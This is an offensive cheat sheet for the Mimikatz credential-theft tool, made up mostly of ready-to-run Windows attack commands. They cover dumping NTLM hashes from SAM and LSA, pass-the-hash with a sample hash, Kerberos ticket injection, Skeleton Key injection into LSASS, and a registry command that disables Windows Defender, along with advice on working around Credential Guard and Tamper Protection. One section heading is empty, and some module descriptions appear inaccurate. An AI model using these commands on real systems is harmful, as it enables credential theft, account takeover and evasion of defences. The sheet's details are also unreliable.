# Mimikatz Cheat Sheet

## Credential Dumping

Different modules target different storage areas within Windows. Both commands below need `privilege::debug` and a SYSTEM token (`token::elevate`) first; without them the module reports an access error rather than hashes.

| Command | Purpose |
|---------|---------|
| lsadump::sam | Dumps local user NTLM hashes from the SAM database |
| lsadump::lsa /patch | Dumps all users: full NTLM hashes, even for protected users |

## Pass-the-Hash (PtH)

Use an NTLM hash to authenticate without the plaintext password. `sekurlsa::pth` starts the program given in `/run:` in a new logon session whose NTLM credential is the supplied hash, so anything that process does over the network authenticates as that user:

```
sekurlsa::pth /user:[User] /domain:[Domain] /ntlm:[NTLM_Hash] /run:powershell.exe
```

Example, spawning cmd.exe as Administrator of target.local:

```
sekurlsa::pth /user:Administrator /domain:target.local /ntlm:ab5116125432651aa4213164a251261a /run:cmd.exe
```

PtH works against any host that still accepts NTLM authentication. Credential Guard on newer Windows versions mitigates the harvesting side: it keeps NTLM hashes and Kerberos keys in a virtualization-isolated process, so LSASS on a protected host yields nothing usable to the sekurlsa module. A hash obtained elsewhere (a SAM dump, an unprotected host) still authenticates. LSA Protection (RunAsPPL) separately blocks mimikatz from opening LSASS at all unless it loads its driver, which is itself a loud event.

## Pass-the-Ticket (PtT)

| Command | Purpose |
|---------|---------|
| kerberos::ptt [path_to_ticket.kirbi] | Inject a Kerberos ticket (.kirbi) into the current logon session |
| kerberos::list | List Kerberos tickets in the current session |

## Domain Persistence (Golden/Silver Tickets)

## Misc Module

| Command | Purpose |
|---------|---------|
| misc::skeleton | Inject Skeleton Key into LSASS (master password set to `mimikatz`); very noisy |
| misc::mem | Dump LSASS process memory to disk |
| misc::log | Start logging console output to file |
| misc::stoplog | Stop logging |
| misc::clip | Read/clear clipboard contents |
| misc::net | Network statistics |

## Disabling Windows Defender

Set the Defender policy value that turns the antispyware engine off (requires administrator rights):

```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
```

Caveat: Microsoft deprecated DisableAntiSpyware in 2020, and on Windows 10 and later with Tamper Protection enabled the value is written but ignored, so confirm the result (for example with `Get-MpComputerStatus`) rather than assuming real-time protection is off. Writing this key is also a common detection trigger.
